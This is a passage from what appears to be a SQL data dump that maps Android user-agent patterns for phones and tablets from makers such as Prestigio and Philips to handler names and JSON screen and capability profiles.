Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P4 prime) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P450) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P5 mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P503) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P508) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P509) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P550) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P551) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P5L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P5Life) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P5W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P5_Energy) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P5_eMagic) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P6000 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P6_Energy) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P6_Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P70) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P770) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P780) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P790) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; P8_Energy) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PE-TL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PGN409) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PGN513) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PGN517) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PGN518) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PGN605) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PHANTOM5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PHICOMM E653(ENERGY L)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PHQ520) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PLE-701L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":768,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PLE-703L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":480,\"screenHeight\":768,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PLK-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PLK-L01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PMT3111_Wi) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_prestigio_pm','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PMT3407_4G) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_prestigio_pm','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PMT3508_4G) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_prestigio_pm','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PMT3797_3G) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_prestigio_pm','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; POLYTRON-R2457) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PRO 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PSP3403DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PSP3423DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PSP3458DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PSP3504DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PSP3506DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PSP3507DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PSP3508DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PSP3517DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PSP3530DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PSP3531DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PSP3532DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PSP5502DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PSP5506DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PSP5509DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PSP5551DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PSP7530DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PSPC550) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PULP 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PULP FAB 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PULP FAB) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PULP) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PURE XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Paris) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Pearl) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Philips S309) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Philips S337) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Philips S616) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Philips V377) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Philips_S326) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Philips_S358) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Philips_S396) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Philips_V526) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Philips_Xenium_V787) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Picasso) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Pixel V2+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Platinum 6.0+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Power Five Evo) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Power Ice) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Power Rage) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PowerFive) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PowerFivePro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PowerFour) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Prime L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; PrimuxEvo) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 